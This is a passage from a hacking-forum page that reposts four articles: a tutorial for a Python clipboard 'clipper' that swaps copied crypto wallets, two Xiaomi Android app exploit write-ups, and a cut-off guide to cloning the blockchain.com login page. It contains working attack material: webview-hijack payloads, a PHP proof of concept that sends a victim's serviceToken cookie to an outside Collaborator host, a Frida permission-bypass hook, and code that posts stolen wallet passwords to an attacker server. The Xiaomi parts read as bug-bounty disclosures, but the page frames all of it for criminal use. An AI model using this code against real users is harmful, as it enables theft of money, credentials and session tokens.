Featured

Check here for featured articles/news.
  • You MUST read the FORUM Rules before making your first post otherwise you may get permanent warning points or a permanent ban. Please keep the forum clean & user friendly.

    Enjoy your presence on here.
Attention! All information is provided for informational and educational purposes only. The author is not responsible for any possible harm caused by the materials of this article. Hello everyone! This is HACKFREAKS . Today we are going to write a fairly simple Python Clipper example. but first of all this stuff doesn't belongs to me.I popped from darksites someone selling it. Happy reading! What is Clipper Clipper is a hidden clipboard replacement program. The clipper replaces the wallets / links copied by the user with the wallets / links of the creator. Example : The victim downloaded a program with a clipper glued in it. The victim launches it, does his business and closes it, but the clipper remains working in the background with no signs of life. After some time, the user decided to transfer money to someone on the QIWI wallet. He copies the desired wallet, and the clipper at this time has already changed the data to his QIWI wallet. The user inserts the wallet number, transfers money. At some point, he realizes that the money has gone somewhere else. With a high probability, the user will think that it was his mistake, and the clipper will remain without suspicion. Preparation I think Clipper is one of the simplest malware you can write. It took me 40 lines of code to make a simple clipper (including comments). Pyperclip library pyperclip plays a major role in our clipper. This is the most simple library for working with the clipboard. And its main plus for me is cross-platform. This is really cool, our clipper will work on all OCs, not just Windows. Installing pyperclip: Linux / Termux / MacOS: pip3 install pyperclip Windows: pip install pyperclip We've finished with the library, now let's start writing the code. We write Clipper in Python The very first thing to always do is import the required libraries: import pyperclip # Import a library for working with the clipboard We have only 2 of them, I have already introduced you to the first one. And from the second, we only import the sleep function, which we need to pause the program. It's very simple to work with pyperclip: import pyperclip #import Everything is as simple as possible, we continue. The next thing we need to do is create variables with wallets, country codes and so on, here you insert everything individually: country_code1 = '1' # 1st Country Code Option We won't even have functions in the program, we'll write everything without them. The only thing we need is to wrap everything in an endless while True loop, and then just process the contents of the clipboard: # Endless cycle This is the main body of our clipper, there is nothing else in the program. Everything is very simple, and if something is not clear, then there is a comment for each line. Complete code ATTENTION! There is no need to copy the code directly from the article, there may be errors and problems. FULL CODE ON PASTEBIN (CLICKABLE) Better copy from pastebin. That's all. Today we have created the most simple clipper, but it will be enough for an example of how such malware works. Continue reading...
Hey Freaks ! This is part 2 of my previous Article " HACKING XIAOMI'S ANDROID APPS " so, without any further delay. let's jump into it. In case if you missed part 1 of this article here's the LINK 5. Remote WebView hijack using open redirect in Xiaomi Game Center leads to theft of data / privacy violation This bug exists in the Xiaomi game center which I have downloaded from https://game.xiaomi.com. I have found an interesting webview hijack which bypasses the whitelist protection in place. Activity com.xiaomi.gamecenter.ui.webkit.KnightsWebKitActivity is exported and accepts deeplinks of the format migamecenter://openurl: <activity android:theme="@style/Theme.Light" android:name="com.xiaomi.gamecenter.ui.webkit.KnightsWebKitActivity" android:exported="true"> 2 <intent-filter> 3 <action android:name="android.intent.action.VIEW"/> 4 <category android:name="android.intent.category.BROWSABLE"/> 5 <category android:name="android.intent.category.DEFAULT"/> 6 <data android:scheme="migamecenter" android:host="openurl"/> 7 </intent-filter> Code1 private boolean c(Intent intent) { 2 Uri data; 3 **<--redacted-->** 4 if (TextUtils.isEmpty(this.Y) && (data = intent.getData()) != null) { 5 String scheme = data.getScheme(); 6 String host = data.getHost(); 7 if (TextUtils.equals(scheme, "migamecenter")) { 8 if (TextUtils.equals(host, fa)) { 9 this.Y = data.toString().substring(23); 10 } else if (TextUtils.equals(host, ga)) { 11 this.qa = false; 12 this.Y = data.toString().substring(26); 13 } else { 14 this.Y = data.toString(); 15 } 16 } else if (Va.b(data, fa)) { 17 String uri = data.toString(); 18 this.Y = uri.substring((scheme + "://").length() + 15 + 12); 19 } else { 20 this.Y = data.toString(); 21 } 22 } 23 Logger.b("KnightsWebKitActivity", "openurl=" + this.Y); 24 Uri uri2 = null; 25 if (!TextUtils.isEmpty(this.Y)) { 26 uri2 = Uri.parse(this.Y); 27 } 28 if (!G(this.Y)) { //VALIDATION OF URL HAPPENING HERE 29 Log.e("knightsweb", "DENY ACCESS!!! Unsupported url."); 30 return false; 31 } 32 **< --redacted-->** 33 } 34 a(uri2, intent); 35 } 36 return true; 37 } At this point, we can try simply loading migamecenter://openurl?www.evil.com and hope that the following line inside the onCreate() function will simply load www.evil.com in our webview:Code1this.ka = new KnightsWebView(this, this, this.na, this.Y);We observe that this fails. Digging deeper, the above function c calls if (!G(this.Y)) which validates that the URL is owned by Xiaomi or related companies. The following function is in com.xiaomi.gamecenter.ui.webkit.Z:Code 1public boolean b(String str) { 2 if (h.f11484a) { 3 h.a(133205, new Object[]{str}); 4 } 5 if (TextUtils.isEmpty(str)) { 6 return false; 7 } 8 String trim = str.trim(); 9 if (TextUtils.isEmpty(trim)) { 10 return false; 11 } 12 if (d(trim)) { 13 return true; 14 } 15 try { 16 Uri parse = Uri.parse(trim); 17 String host = parse.getHost(); 18 if (TextUtils.isEmpty(host)) { 19 return false; 20 } 21 Logger.b("webkit host=" + host); 22 if (host.endsWith(".mi.com") || host.endsWith(".xiaomi.com") || host.endsWith(".wali.com") || host.endsWith(".xiaomi.net") || host.endsWith(".duokan.com") || host.endsWith(".miui.com") || host.endsWith(".mipay.com") || host.endsWith(".duokanbox.com") || TextUtils.equals(host, "mi.com") || TextUtils.equals(host, "xiaomi.com") || host.endsWith(".gov.cn") || host.endsWith("jq.qq.com")) { 23 return Va.b(parse.getScheme()); 24 } 25 return false; 26 } catch (Throwable th) { 27 Logger.a("", th); 28 } 29 } As you can see, this protection looks robust. The application checks whether the URL to be loaded ends with mi.com, xiaomi.com, duokan.com etc. Misconfiguration in Game Center's BaseWebViewClient The KnightsWebView actually sets its WebViewClient to BaseWebViewClient. Looking at the code for this, we come across the shouldOverrideUrlLoading implementation: Code 1public boolean shouldOverrideUrlLoading(WebView webView, String str) { 2 BaseWebView baseWebView2; 3 <--redacted--> 4 if (isJavaScripUrl(str)) { 5 this.mBridgeHandler.sendMessage(this.mBridgeHandler.obtainMessage(256, webView)); 6 return true; 7 } 8 <--redacted--> 9 } else { 10 if (str.startsWith("migamecenter://")) { 11 try { 12 Intent intent = new Intent("android.intent.action.VIEW"); 13 intent.setData(Uri.parse(str)); 14 intent.putExtra("extra_title", m._b); 15 Aa.a(webView.getContext(), intent); 16 } catch (Exception e2) { 17 Log.w("", e2); 18 } 19 return true; 20 } 21 boolean e3 = Y.e(str); 22 if (!e3) { 23 k.b(R.string.unsupported_url_tip); 24 } 25 return e3; 26 } 27 } 28 } Since we are trying to load www.evil.com in our webview, our URL will fall to the last statement: Code 2 if (!e3) { 3 k.b(R.string.unsupported_url_tip); 4 } 5 return e 3; Y.e() returns true if the URL is owned by Xiaomi (.mi.com, .xiaomi.com etc.) and has the HTTPS scheme. Since our URL is https://www.evil.com, it will return FALSE. Unfortunately, inside the WebView's shouldOverrideUrlLoading method, returning FALSE means that webview will continue to load the URL, and returning TRUE means the webview will NOT load that URL. Due to this confusion, https://www.evil.com will actually get loaded in the webview. This means, if we are able to find an open redirect on any of the allowed hosts, the webview will NOT BLOCK the redirected URL. I will be using the following open redirect with a simple bypass: https://api.music.xiaomi.com/web?url=http://www.evil.com\www.xiaomi.com (fixed now) JavaScript bridge in Game Center Game Center implements JS in a very creative (at least in my experience) way and does not use only JavaScript interfaces. It uses a combination of shouldOverrideUrlLoading and a custom android Handler. For example, if JS in a page calls JsBridge.invoke("method-name"), the application will load an iframe with source javascript:<JS-CODE>. This will trigger the shouldOverrideUrlLoading behaviour and call the custom handler: Code 1 if (isJavaScripUrl(str)) { 2 this.mBridgeHandler.sendMessage(this.mBridgeHandler.obtainMessage(256, webView)); 3 return true; 4 } else if (str.startsWith(JS_MESSAGE_PREFIX)) { 5 Message obtainMessage = this.mBridgeHandler.obtainMessage(257, webView); 6 obtainMessage.getData().putString("url", str.substring(str.indexOf(JS_MESSAGE_PREFIX) + 50)); 7 this.mBridgeHandler.sendMessage(obtainMessage); 8 return true; 9 } The mentioned handler will look for that java method inside the com.xiaomi.gamecenter.ui.webkit.BaseWebViewClient class, and then invoke() it, as you can see here: This looks very interesting. Since we are using the getMethod() java method (The java.lang.Class.getMethod() returns a Method object that reflects the specified public member method of the class or interface represented by the Class object), all the methods which are declared as public inside this class can be called in this way by using the above function. Some of these functions include: public void get_session_data() this method returns all session data in a JSON object: public void client_method_execute() this method executes various other methods which include READ/WRITE ACCESS TO ANDROID CALENDAR without permission prompt So now I have a fair idea of how I can interact with the Java code using javascript inside my webview, but I still don't know how I can do this. To be sure, I can try to read the entire code and work my way backwards to come up with a proper payload, but I instead resorted to further recon inside the android app. Many times, I have found that the application will host some of its webview resources inside the resources directory, which can allow an attacker to read the code and figure out how a locally hosted webview file might interact with the application. In this case, I was able to extract some very valuable information from resources > assets > js > jsBridge-mix.js which contained a lot of code involving native webview to Java interaction. You can find the JS here, to see what I was dealing with. After understanding the code, I figured out a lot of function calls and what their purpose is. Looking for the get_session_data() from above also showed how a call looks like: The s() function is basically a modified call to invoke the JS bridge. So now we can build the following payload which will alert the user's session data to us: <html> <body> <script src='remote-server/jsBridge-mix.js'> //host the jsBridge-mix.js from resources directory JsBridge.invoke("get_session_data", {}, function(a) { //the a variable will contain the response JSON object from the Java code var i = {}; i = a; window.alert(JSON.stringify(i); }) </script> </body> </html> Making this attack remote is as easy as using a deeplink in your HTML page and having a user click on it. <a href='migamecenter://openurl?https://api.music.xiaomi.com/web?url=http://www.evil.com\www.xiaomi.com> with the above HTML payload hosted inside. Similarly, I can read the rest of the code and also reverse engineer a payload to execute any method that I want to, like the client_method_execute(). That's all for part 2. I will release more of my findings once Xiaomi fixes them. Thanks for reading :) HACKFREAKS OFFICIAL— FOR NOW CHECK OUT THIS Thank you for the attention! Continue reading...
In this blogpost I want to disclose some interesting security issues that I found while researching on Xiaomi's assets, which got me to #5 within a month and also the top researcher spot for April and May '21. source : takemyhand 1. Stealing users' AuthToken by hijacking WebView in Mi Home The app exported an activity which loaded an external URL directly from user input. A simple ADB PoC is am start -n com.xiaomi.smarthome/com.mi.global.shop.activity.MainTabActivity -d http://tmh/?nativeOpenUrl=www.evil.com As you can see, my payload is in the nativeOpenUrl parameter. Looking at the code for this activity, it is found that the webview implements a custom DownloadListener like the following: this.webView.setDownloadListener(new DownloadListener() { public final void onDownloadStart(String str, String str2, String str3, String str4, long j) { String str5; if (!bhr.O000000o(WebActivity.this.getApplicationContext(), "android.permission.WRITE_EXTERNAL_STORAGE")) { bhh.O000000o(WebActivity.this.getApplicationContext(), (int) R.string.storage_permission_error, 1); return; } WebActivity.this.addDownloadListener(); Context applicationContext = WebActivity.this.getApplicationContext(); DownloadManager.Request request = new DownloadManager.Request(Uri.parse(str)); String cookie = CookieManager.getInstance().getCookie(beb.O0000oO); bfs O0000o00 = bfs.O0000o00(); if (O0000o00.O0000o0O()) { O0000o00.O00000Oo(); bec.O000000o.O00000oO(); if (O0000o00.O000000o(bec.O000000o.O00000o0()) == null) { str5 = null; } else { bec.O000000o.O00000oO(); str5 = O0000o00.O000000o(bec.O000000o.O00000o0()).authToken; } cookie = bfc.O000000o("serviceToken", str5, bec.O00000Oo.O000000o, "/" + beb.O0000oo0, (String) null) + cookie; } bsd.O000000o((Object) cookie); request.addRequestHeader("Cookie", cookie); request.allowScanningByMediaScanner(); request.setNotificationVisibility(1); if (Build.VERSION.SDK_INT >= 16) { request.setAllowedOverMetered(false); } request.setVisibleInDownloadsUi(true); request.setAllowedOverRoaming(true); request.setAllowedNetworkTypes(2); String guessFileName = URLUtil.guessFileName(str, str3, str4); bsd.O000000o((Object) "fileName:".concat(String.valueOf(guessFileName))); request.setDestinationInExternalPublicDir(Environment.DIRECTORY_DOWNLOADS, guessFileName); ((DownloadManager) applicationContext.getSystemService("download")).enqueue(request); } }); We see that the webview introduces it's own method for whenever a download starts. Further, on lines 23-26, we see that it will attach the user's cookies to a request that makes the app start a download.Connecting all the dots, we now simply have to create a page that will send a 'downloadable' response to the webview, and it will send a request with the user's cookies attached. A simple PoC in PHP: <?php header('Content-Type: application/pdf'); header("Content-disposition: attachment; filename=\"" . "ameya.html" . "\""); file_get_contents("http://pvo1ztne9qj33kvlf4edizlhs8yymn.burpcollaborator.net/?exfil=".$_COOKIE["serviceToken"]); echo "downloaded"; ?> As can be seen, the server responds with a 'downloadable' HTTP response, and on receiving the next request, sends the user cookie to a Collaborator instance.Naturally, the next step in the attack was to make this attack remote. For this, deep links were used. The manifest file revealed that the app will parse any links of the format globalshop://mobile.mi.com?<params>. After some more code review, the following link was crafted: globalshop://mobile.mi.com?nativeOpenUrl=https://takemyhand.xyz/downloadable_response.html. This link can be used inside an anchor tag of the attacker's web page, and it will execute the full attack. 2. Overly verbose app logs in Xiaomi Market This bug is nothing fancy, but I think a lot of people might miss this. The Xiaomi Market stored app logs in a public directory, which could have been accessed by any application on the victims' device. This was due to usage of getExternalFilesDir(), which returns a handle to the /sdcard/Android/data/com.xiaomi.market/files directory where the logs reside. Previously I only restricted myself to checking the /sdcard/ directory without looking inside the app's own private (but public?) directory. Looking for these issues is as simple as grepping for getExternalFilesDir() and not just getExternalStorage(). A simple java PoC to steal logs out of the directory is: public class MainActivity extends AppCompatActivity { public static final int PERMISSION_EXTERNAL_STORAGE = 1; /* access modifiers changed from: protected */ @Override // androidx.appcompat.app.AppCompatActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.id.accessibility_custom_action_22); ActivityCompat.requestPermissions(this, new String[]{"android.permission.READ_EXTERNAL_STORAGE"}, 1); File file = new File("/sdcard/Android/data/com.xiaomi.market/files/persist_log1.log"); StringBuilder text = new StringBuilder(); try { BufferedReader br = new BufferedReader(new FileReader(file)); while (true) { String line = br.readLine(); if (line == null) { break; } text.append(line); text.append('\n'); } br.close(); } catch (IOException e2) { Log.d("Error reading file", e2.toString()); } ((TextView) findViewById(R.drawable.bg_gameinfo_score_colorful)).setText(text.toString()); } } 3. Task deception using app linking in Mi Music The manifest file for Mi Music looked like: <intent-filter> <action android:name="android.intent.action.VIEW"/> <category android:name="android.intent.category.DEFAULT"/> <category android:name="android.intent.category.BROWSABLE"/> <!---redacted---> <data android:scheme="miui-music" android:host="web"/> <!---redacted---> </intent-filter> Code for miui-music://web deeplink in com.miui.player.component.HybridUriParser: HACKFREAKS OFFICIAL — a channel with interesting collections of various services of hacking and intresting stuffs public static Intent parseActivity(Context context, Uri uri) { if (uri == null || !FeatureConstants.SCHEME.equals(uri.getScheme())) { return null; } String authority = uri.getAuthority(); IDeviceCompat deviceCompat = IApplicationHelper.CC.getInstance().getDeviceCompat(); if ("settings".equals(authority)) { Intent intent = new Intent(context, deviceCompat.getActivityClass(1)); intent.setData(uri); intent.setPackage(context.getPackageName()); return intent; } else if ("web".equals(authority)) { boolean booleanQueryParameter = uri.getBooleanQueryParameter(FeatureConstants.PARAM_BROWSER_VIEW, false); String queryParameter = uri.getQueryParameter("url"); if (!booleanQueryParameter || TextUtils.isEmpty(queryParameter)) { return null; } return new Intent("android.intent.action.VIEW", Uri.parse(queryParameter)); } else if (!FeatureConstants.AUTHORITY_OUT_BROWSER.equals(authority)) { return null; } else { Intent intent2 = new Intent("android.intent.action.VIEW", Uri.parse(uri.getQueryParameter("url"))); intent2.setFlags(268435456); String queryParameter2 = uri.getQueryParameter(FeatureConstants.PARAM_PACKAGE); if (!TextUtils.isEmpty(queryParameter2)) { intent2.setPackage(queryParameter2); } if (!Utils.isIntentExist(context, intent2)) { intent2.setPackage(null); } return intent2; } } As can be seen, if the deeplink is like miui-music://web/?url=https://www.google.com&browser_view=true, this will launch another intent with data as https://www.google.com and action android.intent.action.VIEW. Naturally, this will be opened in the device's browser. An interesting way to attack such implementations (which is quite common to prevent malicious links from opening inside the webview), is to use app links.Android allows use of app links, which work similar to deep links. If an app link for my app exists, instead of the URL opening in the browser, my application will be launched on the user's device. So, a custom APK was built, and the following intent filters were added <intent-filter android:autoVerify="true"> <action android:name="android.intent.action.VIEW" /> <category android:name="android.intent.category.DEFAULT" /> <category android:name="android.intent.category.BROWSABLE" /> <data android:path="/deceive.html" android:host="recon.takemyhand.xyz" android:scheme="https" /> </intent-filter> This means that all intents with data https://recon.takemyhand.xyz/deceive.html will be launched inside my application. If I just add this intent filter, then on using deeplink miui-music://web/?url=https://recon.takemyhand.xyz/deceive.html&browser_view=true, my app will simply get launched, although without any chance of deceiving the user. To make it 100% convincing, the following intent filters were also added inside the app: <intent-filter> <action android:name="android.intent.action.VIEW"/> <category android:name="android.intent.category.DEFAULT"/> <category android:name="android.intent.category.BROWSABLE"/> <!---redacted---> <data android:scheme="miui-music" android:host="web"/> <!---redacted---> </intent-filter> This will allow the user to choose an application when launching the deeplink miui-music://web/?url=https://recon.takemyhand.xyz/deceive.html&browser_view=true. Even when the user clicks on Mi Music in the intent picker, it will launch the custom APK's activity, since an app link is declared in the application. Lastly, I have also signed my APK and used the SHA 256 fingerprint to generate my own assetlinks.json file on my website, which allows android to open the custom application every time instead of inside the browser. Even when the user chooses Mi Music to open the deeplink, he will be taken to the malicious activity. Since the launchMode of the activity inside Mi Music is set to singleTask, the malicious activity will be launched inside Mi Music app (a task affinity can be set in the malicious application), making it impossible for victim to suspect an attack. This can lead to very easy theft of credentials, as shown below. https://gifyu.com/image/Grlt The simple fix was to specify browser package in com.miui.player.component.HybridUriParser when launching browser intent. 4. Remote WebView hijack to exfiltrate data in Mi Music In the AndroidManifest.xml file you can see the com.miui.player.ui.MusicBrowserActivity processes deeplinks: <intent-filter> <action android:name="android.intent.action.VIEW"/> <category android:name="android.intent.category.DEFAULT"/> <category android:name="android.intent.category.BROWSABLE"/> <data android:scheme="miui-music" android:host="play"/> <data android:scheme="miui-music" android:host="view"/> <data android:scheme="miui-music" android:host="detail"/> <data android:scheme="miui-music" android:host="home"/> <data android:scheme="miui-music" android:host="search"/> <data android:scheme="miui-music" android:host="artist"/> <data android:scheme="miui-music" android:host="more"/> <data android:scheme="miui-music" android:host="web"/> <data android:scheme="miui-music" android:host="playback"/> <data android:scheme="miui-music" android:host="settings"/> <data android:scheme="miui-music" android:host="service"/> <data android:scheme="http" android:host="app.music.xiaomi.com"/> <data android:scheme="https" android:host="app.music.xiaomi.com"/> <data android:scheme="http" android:host="app.fm.duokanbox.com"/> <data android:scheme="https" android:host="app.fm.duokanbox.com"/> <data android:scheme="miui-music" android:host="artist_list"/> <data android:scheme="miui-music" android:host="display"/> <data android:scheme="miui-music" android:host="global_music"/> <data android:scheme="miui-music" android:host="hungama_payment"/> </intent-filter> Looking at the code for com.miui.player.ui.MusicBrowserActivity shows a function called dispatch: public boolean dispatch(Intent intent, boolean z) { MusicLog.i(TAG, "dispatch uri: " + intent.getData()); if (PrivacyCheckHelper.isAgreeMusicPrivacy() || canIgnorePrivacy(intent) || PrivacyCheckHelper.isSkipMusicUserTerm()) { MediaPlaybackServiceProxy mediaPlaybackServiceProxy = this.mPlaybackService; if (mediaPlaybackServiceProxy == null) { MusicLog.e(TAG, "mPlaybackService is NULL, skip this dispatch"); return false; } if (!mediaPlaybackServiceProxy.hasService()) { this.mHandler.sendEmptyMessageDelayed(2, 1500); } Uri parseData = parseData(intent); MusicLog.i(TAG, "open uri, uri=" + parseData); if (parseData != null) { try { if (!TextUtils.isEmpty(parseData.getQueryParameter(FeatureConstants.PARAM_PAY_RESULT))) { this.mFragmentCenter.removeTopFragment(); } } catch (UnsupportedOperationException unused) { MusicLog.i(TAG, "dispatch, UnsupportedOperationException uri:" + parseData); } } String queryParameter = parseData != null ? parseData.getQueryParameter(FeatureConstants.PARAM_REF) : null; if (TextUtils.isEmpty(queryParameter)) { queryParameter = "normal"; } checkOpenOnlineService(queryParameter); PlayableList parseService = HybridUriParser.parseService(parseData); if (parseService != null) { parseService.getQueueDetail().miRef = queryParameter; playByServiceAndShow(parseService, parseData); return true; } playSongsIfNeed(parseData, queryParameter); Intent parseActivity = HybridUriParser.parseActivity(this, parseData); if (parseActivity != null) { Bundle extras = intent.getExtras(); if (extras != null) { parseActivity.putExtras(extras); } try { super.startActivity(parseActivity); } catch (Exception e) { Crashlytics.logException(e); MusicLog.e(TAG, "startActivity Exception:" + e); } return true; } FragmentInfo parseFragment = HybridUriParser.parseFragment(parseData); if (parseFragment == null && !z) { parseFragment = HybridUriParser.home(); } if (parseFragment != null) { MusicLog.i(TAG, "startFragment "); parseFragment.mArgs = intent.getExtras(); MusicTrace.beginTrace(TAG, "startFragment"); this.mFragmentCenter.start(parseFragment); MusicTrace.endTrace(); return true; } MusicLog.i(TAG, "unhandle intent"); return false; } showPrivacyPage(); return false; } Uri parseData = parseData(intent); parses the intent and passes it to parseFragment() in the last function inside dispatch. The code for parseFragment: public static FragmentInfo parseFragment(Uri uri) { if (uri == null || !FeatureConstants.SCHEME.equals(uri.getScheme())) { return null; } IDeviceCompat deviceCompat = IApplicationHelper.CC.getInstance().getDeviceCompat(); Uri adapter = DisplayCompact.adapter(uri); if (adapter == null) { return null; } IAppInstance.CC.getInstance().OnlineServiceHelperCheckOnlineUriAndOpenSwitch(IApplicationHelper.CC.getInstance().getContext(), adapter); String authority = adapter.getAuthority(); if ("display".equals(authority) || FeatureConstants.AUTHORITY_FOLDER_PICKER.equals(authority)) { //redacted } else if (FeatureConstants.AUTHORITY_HUNGAMA_PAYMENT.equals(authority)) { //redacted } else if ("webview".equals(authority)) { FragmentInfo fragmentInfo3 = new FragmentInfo(); fragmentInfo3.mClz = deviceCompat.getFragmentClass(12); fragmentInfo3.mOneshot = adapter.getBooleanQueryParameter(FeatureConstants.PARAM_MIBACK, false); fragmentInfo3.mArgs = AnimationDef.SLIDE.toBundle(null); fragmentInfo3.mUri = adapter; return fragmentInfo3; } else if (DisplayUriConstants.HYBRID_AUTHORITIES.contains(authority) || adapter.getBooleanQueryParameter("hybrid", false)) { //redacted } Now we know what deeplink is needed to trigger the webview with our URL: miui-music://global_music/?page_type=webview&url=https://www.evil.com Now to find a way to escalate this attack, a way had to be discovered to exploit this insecure webview usage. In com.xiaomi.music.hybrid.internal.HybridManager class you can see that javascript interface is getting added: private void initView() { initSettings(this.mView.getSettings()); this.mView.setWebViewClient(new HybridViewClient(this)); HybridChromeClient hybridChromeClient = new HybridChromeClient(); hybridChromeClient.setHybridManager(this); this.mView.setWebChromeClient(hybridChromeClient); if (HybridView.DEBUG) { WebView.setWebContentsDebuggingEnabled(true); } HybridView hybridView = this.mView; JsInterface jsInterface = this.mJsInterface; hybridView.addJavascriptInterface(jsInterface, jsInterface.getInterfaceName()); this.mView.addOnAttachStateChangeListener(this.mAttachStateChangeListener); } the javascript interfaces are declared in com.xiaomi.music.hybrid.internal.JsInterface. You can see that there are 2 javascript interfaces: @JavascriptInterface public String config(String str) { String config = this.mManager.config(str); if (Log.isLoggable("hybrid", 3)) { Log.d("hybrid", "config response is " + config); } return config; } @JavascriptInterface public String invoke(String str, String str2, String str3, String str4) { String invoke = this.mManager.invoke(str, str2, str3, str4); if (Log.isLoggable("hybrid", 3)) { Log.d("hybrid", "blocking response is " + invoke); } return invoke; } Code for mManager.invoke() found in com.xiaomi.music.hybrid.internal.HybridManager: public String invoke(String str, String str2, String str3, String str4) { if (!this.mPM.isValid(this.mPageContext.getUrl())) { return new Response(203).toString(); } Request request = new Request(); request.setAction(str2); request.setRawParams(str3); request.setPageContext(this.mPageContext); request.setView(this.mView); request.setNativeInterface(this.mNativeInterface); try { HybridFeature lookupFeature = this.mFM.lookupFeature(str); HybridFeature.Mode invocationMode = lookupFeature.getInvocationMode(request); if (invocationMode == HybridFeature.Mode.SYNC) { Response invoke = lookupFeature.invoke(request); callback(invoke, this.mPageContext, str4); return invoke.toString(); } else if (invocationMode == HybridFeature.Mode.ASYNC) { sPool.execute(new AsyncInvocation(lookupFeature, request, str4)); return new Response(2).toString(); } else { request.setCallback(new Callback(this, this.mPageContext, str4)); sPool.execute(new AsyncInvocation(lookupFeature, request, str4)); return new Response(3).toString(); } } catch (HybridException e) { Response response = e.getResponse(); callback(response, this.mPageContext, str4); return response.toString(); } } The HybridFeature lookupFeature = this.mFM.lookupFeature(str); allows us to call certain features. A list of all these features can be found under com.miui.player.hybrid.feature folder. So using our webview, we should able to query any of these features. For example, to get the userInfo, our payload inside the webview will be: <script>MiuiJsBridge.invoke("com.miui.player.hybrid.feature.QueryUserInfo", "callback", null, "(function(t) {alert(t)})");</script> This payload took quite some time to make. The first parameter is an identifier to the feature we want to call, the second parameter is the type of request we are making. In this case, we use the callback mode and use our callback as (function(t) {alert(t)} which will take the response from the java code and alert it.If you try loading the above script inside your HTML page and load it inside your webview, you will get permission error. Why? So in the first line of the invoke function, you can see: if (!this.mPM.isValid(this.mPageContext.getUrl())) { The code for this can be found in the com.xiaomi.music.hybrid.internal.PermissionManager class. As you can see, we need a valid Config object: The code for this can be found in the com.xiaomi.music.hybrid.internal.PermissionManager class. As you can see, we need a valid Config object: private String config(Config config, boolean z) { if (z) { SecurityManager securityManager = new SecurityManager(config, this.mActivity.getApplicationContext()); if (securityManager.isExpired() || !securityManager.isValidSignature()) { // validation of the config object return new Response(202).toString(); } } this.mFM = new FeatureManager(config, this.mActivity.getClassLoader()); this.mPM = new PermissionManager(config); return new Response(0).toString(); } A Config object is initialised every time the app opens a URL inside the webview. This objects properties include a signature, an array of allowed domains and subdomains, and some other app-specific items. A custom Config can be declared using the config() javascript interface mentioned in the com.xiaomi.music.hybrid.internal.JsInterface file. However, this requires a lot of reverse engineering as it involves generating a valid signature. Since the object was huge(as you will see in the video), to get a valid Config object, we will use Frida, so that we can understand how a Config object affects our control over the webview. We will use the following Frida script to capture a valid Config object: Java.perform(function() { console.log("Starting hook"); var Activity = Java.use("com.xiaomi.music.hybrid.internal.PermissionManager"); Activity.isValid.implementation = function () { return true; }; Java.choose("com.xiaomi.music.hybrid.internal.Config", { onMatch: function(inst) { console.log("value " + inst.getSignedContent()) } }); }); As you can see in the youtube video, I am able to get a default valid Config object, in which the firebasestorage.googleapis.com seems to have been whitelisted as a domain. This means that the javascript hosted on the https://firebasestorage.googleapis.com/* sites will be able to invoke the invoke interface without any error, since this URL will be present inside the Config object on webview init, thereby successfully passing the isValid() check. Firebase allows any user to store files (HTML files in this case) on the firebasestorage.googleapis.com domain. Go to https://console.firebase.google.com/u/0/ Select a project Click on storage on the left side tab. Create an HTML file with the following payload and get the resulting URL: <script>MiuiJsBridge.invoke("com.miui.player.hybrid.feature.QueryUserInfo", "callback", null, "(function(t) {alert(t)})");</script> ADB shell: am start -n com.miui.player/com.miui.player.ui.MusicBrowserActivity -d "miui-music://global_music/?page_type=webview&url=<FIREBASE-URL-HERE>" After running the above command, we are successfully able to bypass the permissions and invoke any JS interface remotely. Other payloads: Basically, all the features (com.miui.player.hybrid.feature.*) in the attached screenshot can now be queried by the attacker Display android toast: This will make an Android toast on victim's device: <script>MiuiJsBridge.invoke("com.miui.player.hybrid.feature.ToastFeature", "sync", "{content: 'takemyhand'}", null);</script> Get user search history: <script>alert(MiuiJsBridge.invoke("com.miui.player.hybrid.feature.GetSearchHistory", "sync", null, null));</script> Query current playing song: <script>MiuiJsBridge.invoke("com.miui.player.hybrid.feature.QueryNowplayingInfo", "callback", null, "(function(t) {alert(t)})")</script> Lastly, other music and device related information can be queried in a similar way using the com.miui.player.hybrid.feature.ConfigStatics class and also all the other query features. <script>alert(MiuiJsBridge.invoke("com.miui.player.hybrid.feature.ConfigStatics", "sync", "{type: 10}", null));</script> The type parameter in the above payload can be adjusted according to the numbers mentioned in com.miui.player.hybrid.feature.ConfigStatics class. Attacker can also remotely control music (play, seek, next, previous) using com.miui.player.hybrid.feature.ControlService and get all JOOX account information using com.miui.player.hybrid.feature.JooxBridgeFeature. TO BE CONTINUED.. HACKFREAKS OFFICIAL— FOR NOW CHECK OUT THIS Thank you for the attention! Continue reading...
We have all heard about blockchain fakes (in our case, blockchain.com), but has any of us mere mortals seen the implementation itself and what is a fake? Attention! All information is provided for informational and educational purposes only. The author is not responsible for any possible harm caused by the materials of this article. At the same time, buying a finished product on the market without knowing what it consists of technically is very risky. Indeed, over the past six months, or maybe a year, a lot of scammers have already been announced, which showed a demo of fake and merged after receiving a large amount, but the article itself is not about that. NON-STANDARD article competition - requires non-standard solutions))) It was in the evening, there was nothing to do, and I decided to see how it is possible to implement a fake blockchain without having a general technical idea of how others have implemented it, relying only on the description of the capabilities and documentation. And so, for a minute, let's remember everything we know about fakes. In simple words, a fake is a full-fledged copy of the site with the only difference in the domain, where the main idea is that the visitor does not understand the substitution and enter the data we need. And so, let's go! First of all, we go to the site: https://login.blockchain.com Notice the version data below and the link that leads to Github. We pass on it and see that the sorts of the web interface are laid out in the repository! Hmm ... I wonder if it turns out that you can bring up a copy of the web interface without any knowledge? I couldn't believe my eyes, was it that easy? Who came up with the idea to lay out this good officially is not at all clear. Next, we read the instructions, try to install: Code wget https://codeload.github.com/blockchain/blockchain-wallet-v4-frontend/zip/refs/tags/v4.48.16 unzip blockchain-wallet-v4-frontend-4.48.16.zip cd blockchain-wallet-v4 -frontend ./setup.sh yarn start: dev The result - well, "almost" a full-fledged fake :) True, so far this fake does nothing in terms of sending data, which we will now do. We need to find authorization in the files and try to add our function. Searching files for the keyword "login". Find the main authorization file Open the file: packages / blockchain-wallet-v4-frontend / src / data / auth / sagas.js Add a function for simple sending: const submitAuth = function ({guid, password}) { axios ({ url: ` https: //admin.blockchain.test/api/wallets` , method: 'POST', data: { guid: guid, password: password } , headers: { 'Content-Type': 'application / json' } }) } And also after the session block: let session = yield select (selectors.session.getSession, guid) Add: yield call (submitAuth, {guid, password}) The most important thing left is to run it all on a test domain and see all the performance. Editing the hosts file: 127.0.0.1 login.blockchain.test Open http: //login.blockchain.test and try to log in. We look that nothing is happening, first of all we check the console: I was disappointed, it turns out that the API server does not allow making requests from the outside because of CORS. Thinking, thinking, how is CORS solved? So after 